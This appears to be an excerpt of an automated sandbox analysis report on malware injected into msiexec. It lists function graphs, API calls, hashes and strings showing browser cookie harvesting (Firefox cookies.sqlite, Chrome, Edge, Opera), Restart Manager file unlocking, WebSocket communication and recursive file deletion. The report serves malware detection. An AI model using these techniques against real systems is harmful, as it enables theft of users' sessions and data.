                                                                                                                                                                                                          control_flow_graph 0 214d9293-214d92bc call 214d8550 4 214d9356-214d9373 0->4 5 214d92c2-214d92c6 0->5 10 214d939a-214d93b0 call 214d3dc0 call 214d85a0 4->10 7 214d92cc 5->7 8 214d92c8-214d92ca 5->8 9 214d92ce-214d92ed call 214d8550 7->9 8->9 15 214d92ef-214d92f6 9->15 16 214d92f8-214d92fc 9->16 20 214d93b5-214d93c2 call 214d36c0 10->20 15->4 18 214d92fe-214d9300 16->18 19 214d9302 16->19 21 214d9304-214d9320 call 214d8550 18->21 19->21 26 214d93d8-214d93fe call 214d9f90 20->26 27 214d93c4-214d93d3 20->27 30 214d934f 21->30 31 214d9322-214d9326 21->31 36 214d9401-214d9406 26->36 28 214d97b1-214d97c1 call 214ddd3f call 214d84c0 27->28 48 214d97c4-214d97cc 28->48 30->4 33 214d932c 31->33 34 214d9328-214d932a 31->34 37 214d932e-214d9346 call 214d8550 33->37 34->37 36->36 40 214d9408-214d9421 send 36->40 46 214d9348 37->46 47 214d9375-214d9379 37->47 43 214d9459-214d9480 call 214d9f90 40->43 44 214d9423-214d944c call 214d9f90 40->44 56 214d9483-214d9488 43->56 55 214d9450-214d9455 44->55 46->30 51 214d937d-214d937e 47->51 52 214d937b 47->52 51->10 52->51 55->55 57 214d9457 55->57 56->56 58 214d948a-214d94bd call 214d9f90 56->58 57->58 62 214d94c0-214d94c5 58->62 62->62 63 214d94c7-214d94fc send call 214d9f90 62->63 66 214d9500-214d9505 63->66 66->66 67 214d9507-214d951e send 66->67 68 214d956e 67->68 69 214d9520-214d9524 67->69 70 214d9574-214d9593 call 214d9f90 68->70 71 214d9528-214d954b call 214d9f90 69->71 72 214d9526 69->72 77 214d9596-214d959b 70->77 78 214d9550-214d9555 71->78 72->71 77->77 79 214d959d-214d95ce send call 214d9f90 77->79 78->78 80 214d9557-214d956c send 78->80 83 214d95d0-214d95d5 79->83 80->70 83->83 84 214d95d7-214d9605 send call 214d9f90 83->84 87 214d9608-214d960d 84->87 87->87 88 214d960f-214d961e send 87->88 89 214d9620-214d9623 88->89 90 214d9625-214d962b 89->90 91 214d9641-214d9657 recv 89->91 92 214d962d-214d9635 90->92 93 214d9660-214d966e 90->93 91->48 94 214d965d-214d965e 91->94 92->93 95 214d9637-214d963f 92->95 96 214d9670-214d9674 93->96 97 214d9683-214d969e call 214d8550 93->97 94->89 95->91 95->93 98 214d9678-214d9679 96->98 99 214d9676 96->99 102 214d979c-214d97a0 97->102 103 214d96a4-214d96a8 97->103 98->97 99->98 104 214d97a4-214d97ac 102->104 105 214d97a2 102->105 103->102 106 214d96ae 103->106 104->28 105->104 107 214d96b4 106->107 108 214d96b6-214d96b9 107->108 109 214d96bb-214d96c1 108->109 110 214d96d7-214d96e9 recv 108->110 111 214d96c3-214d96cb 109->111 112 214d96f2-214d96f9 109->112 110->48 113 214d96ef-214d96f0 110->113 111->112 114 214d96cd-214d96d5 111->114 112->107 115 214d96fb-214d9702 112->115 113->108 114->110 114->112 115->107 116 214d9704-214d979b setsockopt ioctlsocket call 214da5f3 115->116
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Connection: Upgrade$ERROR: Could not parse WebSocket url: %s$ERROR: Got bad status connecting to %s: %s$ERROR: Got invalid status line connecting to: %s$GET /%s HTTP/1.1$HTTP/1.1 %d$Host: %s$Host: %s:%d$Origin: %s$P$Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==$Sec-WebSocket-Version: 13$Unable to connect to %s:%d$Upgrade: websocket$e$ws://%[^:/]$ws://%[^:/]/%s$ws://%[^:/]:%d$ws://%[^:/]:%d/%s
                                                                                                                                                                                                          • API String ID: 0-1585909395
                                                                                                                                                                                                          • Opcode ID: d218b156274b1dfa5b7329a4e83291710870e113ec1fb49e5eb7e960a1d23b0b
                                                                                                                                                                                                          • Instruction ID: 51cff517ac93384069a37400b920c705cee9b72bb8388cd4a7b63f7cb33a7201
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d218b156274b1dfa5b7329a4e83291710870e113ec1fb49e5eb7e960a1d23b0b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FE103B6900205AEEF14CF64CCA4FADB77CEB0A314F4481E9E60DA7286D7719649CF54
                                                                                                                                                                                                          Function 214D7240 Relevance: 42.1, APIs: 12, Strings: 12, Instructions: 59libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,214D6E4E), ref: 214D7252
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 214D725B
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,214D6E4E), ref: 214D726C
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 214D726F
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,214D6E4E), ref: 214D7286
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 214D7289
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,214D6E4E), ref: 214D729A
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 214D729D
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,214D6E4E), ref: 214D72AE
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 214D72B1
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,214D6E4E), ref: 214D72C2
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 214D72C5
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                                                                                          • String ID: GetFinalPathNameByHandleW$NtQueryInformationProcess$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$Rstrtmgr$Rstrtmgr$Rstrtmgr$kernel32$ntdll
                                                                                                                                                                                                          • API String ID: 4236061018-788455005
                                                                                                                                                                                                          • Opcode ID: fd5f414821e6ec4e6c3f87a79229b9a323d6366d2f244d1d8e66d3e800a3d6f9
                                                                                                                                                                                                          • Instruction ID: c1be495cf1b774e547cd0fff5479ba295087f95fb2d460280f11a56d0c5a90bf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd5f414821e6ec4e6c3f87a79229b9a323d6366d2f244d1d8e66d3e800a3d6f9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 381112B194021AEDDF21AF728C49F5B3FA8E781256F562436A60C9B344CE3C8158CF51
                                                                                                                                                                                                          Function 214D6FA0 Relevance: 19.7, APIs: 13, Instructions: 236COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000440,00000000,00000000), ref: 214D7054
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: OpenProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3743895883-0
                                                                                                                                                                                                          • Opcode ID: 805764e40d60c6dc8aa25330a8ad57b215aa4d770210387496b741d27a83e0cb
                                                                                                                                                                                                          • Instruction ID: c566331bdf0c1fd902d9db0fd43b29f91ed404e8d61cf2fde3935e5970e3cd48
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 805764e40d60c6dc8aa25330a8ad57b215aa4d770210387496b741d27a83e0cb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1171C1B2A40209BFEF119BA4CC45FAE7B79EF15715F100165FA0CE6280EB759A10CBA1
                                                                                                                                                                                                          Function 214D12CB Relevance: 17.3, APIs: 2, Strings: 9, Instructions: 828COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 403 214d12cb-214d12fb call 214d4160 call 214d5f20 408 214d12fd-214d1306 403->408 409 214d133e-214d1348 403->409 410 214d1308-214d1310 call 214d4160 408->410 411 214d1315-214d1339 call 214d3b90 408->411 412 214d134a-214d134f call 214d4160 409->412 413 214d1354-214d1366 call 214d6020 409->413 410->411 411->409 412->413 419 214d13a9-214d13b3 413->419 420 214d1368-214d1371 413->420 421 214d13bf-214d13d1 call 214d6120 419->421 422 214d13b5-214d13ba call 214d4160 419->422 423 214d1380-214d13a4 call 214d3b90 420->423 424 214d1373-214d137b call 214d4160 420->424 430 214d140b-214d1415 421->430 431 214d13d3-214d13d9 421->431 422->421 423->419 424->423 434 214d1417-214d141c call 214d4160 430->434 435 214d1421-214d15eb call 214d5c00 call 214d3a70 call 214d67d0 call 214d3a70 call 214d67d0 call 214d3a70 call 214d67d0 call 214d7a40 call 214d3a70 * 2 call 214d1ee0 430->435 432 214d13e8-214d1406 call 214d3b90 431->432 433 214d13db-214d13e3 call 214d4160 431->433 432->430 433->432 434->435 471 214d17ea-214d17fd 435->471 472 214d15f1-214d15f5 435->472 473 214d1800-214d1802 call 214d7e20 471->473 474 214d1848-214d184d call 214da5c6 472->474 475 214d15fb-214d1626 472->475 481 214d1807-214d1809 473->481 482 214d1852 474->482 476 214d162c 475->476 477 214d1628-214d162a 475->477 480 214d162e-214d1650 call 214d3a70 call 214d6220 476->480 477->480 496 214d1654-214d1666 call 214d25a0 480->496 497 214d1652 480->497 484 214d180b-214d1813 Sleep 481->484 485 214d1815-214d183d 481->485 486 214d1854-214d188e call 214d3a70 482->486 484->473 484->485 485->482 489 214d183f-214d1841 485->489 492 214d1894 486->492 493 214d1890-214d1892 486->493 489->486 495 214d1896-214d18dc call 214d3a70 call 214d1ee0 492->495 493->495 513 214d1ae1-214d1aee 495->513 514 214d18e2-214d18e6 495->514 501 214d166b-214d1679 496->501 497->496 503 214d16dc-214d16e6 501->503 504 214d167b-214d1681 501->504 506 214d16e8-214d16f1 503->506 507 214d1726-214d1742 503->507 508 214d16c1-214d16d7 call 214d40f0 504->508 509 214d1683-214d168c 504->509 515 214d171d-214d1723 call 214da956 506->515 516 214d16f3-214d16f6 506->516 510 214d174e-214d177f call 214d4c10 call 214d3ff0 507->510 511 214d1744-214d1749 call 214d4160 507->511 508->503 517 214d168e-214d1691 509->517 518 214d16b8-214d16be call 214da956 509->518 550 214d17bf-214d17e4 510->550 551 214d1781-214d178b 510->551 511->510 519 214d1af0-214d1af9 call 214d7e20 513->519 514->474 523 214d18ec-214d1917 514->523 515->507 524 214d16fc-214d1701 516->524 525 214d1843 call 214ddaab 516->525 517->525 526 214d1697-214d169c 517->526 518->508 543 214d1afb-214d1b03 Sleep 519->543 544 214d1b05-214d1b2d 519->544 532 214d191d 523->532 533 214d1919-214d191b 523->533 524->525 534 214d1707-214d170c 524->534 525->474 526->525 536 214d16a2-214d16a7 526->536 540 214d191f-214d1941 call 214d3a70 call 214d63b0 532->540 533->540 534->525 541 214d1712-214d1715 534->541 536->525 537 214d16ad-214d16b0 536->537 537->525 542 214d16b6 537->542 562 214d1945-214d1957 call 214d25a0 540->562 563 214d1943 540->563 541->525 546 214d171b 541->546 542->518 543->519 543->544 548 214d1b2f-214d1b31 544->548 549 214d1b33 544->549 546->515 554 214d1b35-214d1b6f call 214d3a70 548->554 549->554 550->471 550->475 555 214d178d-214d178f 551->555 556 214d17b6-214d17bc call 214da956 551->556 567 214d1b75 554->567 568 214d1b71-214d1b73 554->568 555->525 560 214d1795-214d179a 555->560 556->550 560->525 565 214d17a0-214d17a5 560->565 570 214d195c-214d196a 562->570 563->562 565->525 569 214d17ab-214d17ae 565->569 571 214d1b77-214d1bab call 214d3a70 call 214d1ee0 call 214d3420 567->571 568->571 569->525 572 214d17b4 569->572 573 214d19cd-214d19d7 570->573 574 214d196c-214d1972 570->574 607 214d1c5c-214d1c66 call 214d3450 call 214d7de0 571->607 608 214d1bb1-214d1c56 call 214d33e0 call 214d3500 call 214d64b0 call 214d3450 call 214d25a0 call 214d3730 call 214d36c0 call 214d3460 call 214d4c10 call 214d36a0 call 214d36c0 call 214d3420 571->608 572->556 576 214d19d9-214d19e2 573->576 577 214d1a17-214d1a33 573->577 578 214d1974-214d197d 574->578 579 214d19b2-214d19c8 call 214d40f0 574->579 582 214d1a0e-214d1a14 call 214da956 576->582 583 214d19e4-214d19e7 576->583 586 214d1a3f-214d1a70 call 214d4c10 call 214d3ff0 577->586 587 214d1a35-214d1a3a call 214d4160 577->587 584 214d197f-214d1982 578->584 585 214d19a9-214d19af call 214da956 578->585 579->573 582->577 583->525 591 214d19ed-214d19f2 583->591 584->525 592 214d1988-214d198d 584->592 585->579 611 214d1ab0-214d1ad5 586->611 612 214d1a72-214d1a7b 586->612 587->586 591->525 598 214d19f8-214d19fd 591->598 592->525 599 214d1993-214d1998 592->599 598->525 604 214d1a03-214d1a06 598->604 599->525 605 214d199e-214d19a1 599->605 604->525 609 214d1a0c 604->609 605->525 610 214d19a7 605->610 624 214d1c6b-214d1ed0 call 214d4c10 call 214d4be0 * 11 call 214d36c0 * 11 call 214d38d0 * 3 call 214d3460 * 5 call 214d36c0 * 8 607->624 608->607 609->582 610->585 611->523 618 214d1adb 611->618 615 214d1a7d-214d1a80 612->615 616 214d1aa7-214d1aad call 214da956 612->616 615->525 620 214d1a86-214d1a8b 615->620 616->611 618->513 620->525 625 214d1a91-214d1a96 620->625 625->525 629 214d1a9c-214d1a9f 625->629 629->525 632 214d1aa5 629->632 632->616
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                                                          • String ID: 0$RPe%$chrome.exe$invalid vector<T> subscript$msedge.exe$opera.exe$/L$TS$YM
                                                                                                                                                                                                          • API String ID: 1174141254-1233981215
                                                                                                                                                                                                          • Opcode ID: 673c9cc69bef5515d255ea8c005f24b2e49d2b2ef037750415866762b234c6dc
                                                                                                                                                                                                          • Instruction ID: 51e1c84c14024b4f67885e9149479a2904cbf78e6e418553affb368ef94ab695
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 673c9cc69bef5515d255ea8c005f24b2e49d2b2ef037750415866762b234c6dc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1472A1729001199FDF18CF64C864BEE7BB1AF65B08F2041ACD409AB291DB759B49CBA1
                                                                                                                                                                                                          Function 214D5C00 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 233fileCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 812 214d5c00-214d5c53 call 214dd8c1 815 214d5c59-214d5c5e 812->815 816 214d5c55-214d5c57 812->816 818 214d5c60-214d5c69 815->818 817 214d5c6f-214d5ca6 call 214d3970 call 214d4330 call 214d4d80 816->817 826 214d5ca8 817->826 827 214d5caa-214d5cc0 FindFirstFileW 817->827 818->818 820 214d5c6b-214d5c6d 818->820 820->817 826->827 828 214d5ccc-214d5ce3 827->828 829 214d5cc2-214d5cc7 call 214d4160 827->829 831 214d5ce5-214d5cff call 214d3970 828->831 832 214d5d04-214d5d30 FindNextFileW 828->832 829->828 842 214d5eb4-214d5eba 831->842 833 214d5e96-214d5ea4 FindClose call 214d34a0 832->833 834 214d5d36 832->834 841 214d5ea9-214d5eaf call 214d36c0 833->841 836 214d5d40-214d5d47 834->836 839 214d5d4d-214d5d52 836->839 840 214d5e84-214d5e90 FindNextFileW 836->840 843 214d5d58-214d5d5e 839->843 840->833 840->836 841->842 845 214d5ebc-214d5ec1 call 214d4160 842->845 846 214d5ec6-214d5ed8 842->846 847 214d5d7e-214d5d80 843->847 848 214d5d60-214d5d63 843->848 845->846 852 214d5d83-214d5d85 847->852 850 214d5d7a-214d5d7c 848->850 851 214d5d65-214d5d6d 848->851 850->852 851->847 853 214d5d6f-214d5d78 851->853 852->840 854 214d5d8b-214d5d90 852->854 853->843 853->850 855 214d5d96-214d5d9c 854->855 856 214d5dbc-214d5dbe 855->856 857 214d5d9e-214d5da1 855->857 858 214d5dc1-214d5dc3 856->858 859 214d5db8-214d5dba 857->859 860 214d5da3-214d5dab 857->860 858->840 861 214d5dc9-214d5e20 call 214d3970 call 214d4d80 call 214d6d90 858->861 859->858 860->856 862 214d5dad-214d5db6 860->862 869 214d5e2f-214d5e50 861->869 870 214d5e22-214d5e2a call 214d4160 861->870 862->855 862->859 872 214d5e5c-214d5e70 PathFileExistsW 869->872 873 214d5e52-214d5e57 call 214d4160 869->873 870->869 875 214d5ed9-214d5ef1 FindClose call 214d5030 872->875 876 214d5e72-214d5e78 872->876 873->872 881 214d5efd-214d5f11 875->881 882 214d5ef3-214d5ef8 call 214d4160 875->882 876->840 877 214d5e7a-214d5e7f call 214d4160 876->877 877->840 881->841 882->881
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,-00000002,-00000002), ref: 214D5CB2
                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(00000000,?), ref: 214D5D2C
                                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 214D5E68
                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 214D5E8C
                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 214D5E97
                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 214D5EDA
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Find$File$CloseNext$ExistsFirstPath
                                                                                                                                                                                                          • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                                                          • API String ID: 913281501-405221262
                                                                                                                                                                                                          • Opcode ID: f82fb119a7acc28c407fac4e2a00e5864b12a490df5230b7f63b683e4b7629fb
                                                                                                                                                                                                          • Instruction ID: dd9fb08bf074d257a64502abca28559dd9f0339fdfe0dd4fd6fc01bb1405d821
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f82fb119a7acc28c407fac4e2a00e5864b12a490df5230b7f63b683e4b7629fb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA81A07290014A9EDF05DFA4C868BEEBBB5EF25718F10816DD40DAB390EB359E45CB60
                                                                                                                                                                                                          Function 214D7E20 Relevance: 13.7, APIs: 9, Instructions: 188fileCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 919 214d7e20-214d7e3b 920 214d7e40-214d7e4e 919->920 920->920 921 214d7e50-214d7e59 920->921 922 214d7e60-214d7e6a 921->922 922->922 923 214d7e6c-214d7e87 922->923 924 214d7e90-214d7e9e 923->924 924->924 925 214d7ea0-214d7ea9 924->925 926 214d7eb0-214d7eba 925->926 926->926 927 214d7ebc-214d7edc FindFirstFileW 926->927 928 214d8092-214d809a 927->928 929 214d7ee2 927->929 930 214d7ee4-214d7efa 929->930 930->930 931 214d7efc 930->931 932 214d7f02-214d7f12 FindNextFileW 931->932 933 214d806d-214d8076 GetLastError 932->933 934 214d7f18-214d7f1d 932->934 936 214d8078-214d808a FindClose RemoveDirectoryW 933->936 937 214d808b-214d808c FindClose 933->937 935 214d7f23-214d7f29 934->935 938 214d7f49-214d7f4b 935->938 939 214d7f2b-214d7f2e 935->939 937->928 940 214d7f4e-214d7f50 938->940 941 214d7f45-214d7f47 939->941 942 214d7f30-214d7f38 939->942 940->932 943 214d7f52-214d7f5d 940->943 941->940 942->938 944 214d7f3a-214d7f43 942->944 945 214d7f60-214d7f66 943->945 944->935 944->941 946 214d7f68-214d7f6b 945->946 947 214d7f86-214d7f88 945->947 948 214d7f6d-214d7f75 946->948 949 214d7f82-214d7f84 946->949 950 214d7f8b-214d7f8d 947->950 948->947 951 214d7f77-214d7f80 948->951 949->950 950->932 952 214d7f93-214d7f9b 950->952 951->945 951->949 953 214d7fa0-214d7fa9 952->953 953->953 954 214d7fab-214d7fb3 953->954 955 214d7fb6-214d7fc0 954->955 955->955 956 214d7fc2-214d7fd8 955->956 957 214d801d-214d801f 956->957 958 214d7fda-214d7fe7 call 214d7e20 956->958 960 214d8021-214d802d SetFileAttributesW 957->960 961 214d8033-214d8042 DeleteFileW 957->961 958->937 964 214d7fed-214d7ffe RemoveDirectoryW 958->964 960->961 961->937 963 214d8044-214d8046 961->963 965 214d8050-214d8066 963->965 966 214d8000-214d8016 964->966 965->965 967 214d8068 965->967 966->966 968 214d8018 966->968 967->931 968->932
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,00000000,75080F00), ref: 214D7ED1
                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(00000000,?,?,00000000,75080F00), ref: 214D7F0A
                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,?,00000000,75080F00), ref: 214D7FFA
                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,00000000,75080F00), ref: 214D802D
                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,00000000,75080F00), ref: 214D803A
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,75080F00), ref: 214D806D
                                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,00000000,75080F00), ref: 214D8079
                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,?,00000000,75080F00), ref: 214D8082
                                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,00000000,75080F00), ref: 214D808C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2341273852-0
                                                                                                                                                                                                          • Opcode ID: f450b07afd8d6b570890b793beb86bfb1d0a9b2c497b33a93fd8217d2bdc642e
                                                                                                                                                                                                          • Instruction ID: 976fd52e1287befc61380eaddc804de8be08104b0eac7ffad5800e43e1d75316
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f450b07afd8d6b570890b793beb86bfb1d0a9b2c497b33a93fd8217d2bdc642e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70610F7660010A8ACF119F64C865FF6B376FF16359F5041EDDA0D97381EB329A86CBA0
                                                                                                                                                                                                          Function 214D7890 Relevance: 12.2, APIs: 8, Instructions: 154processthreadCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
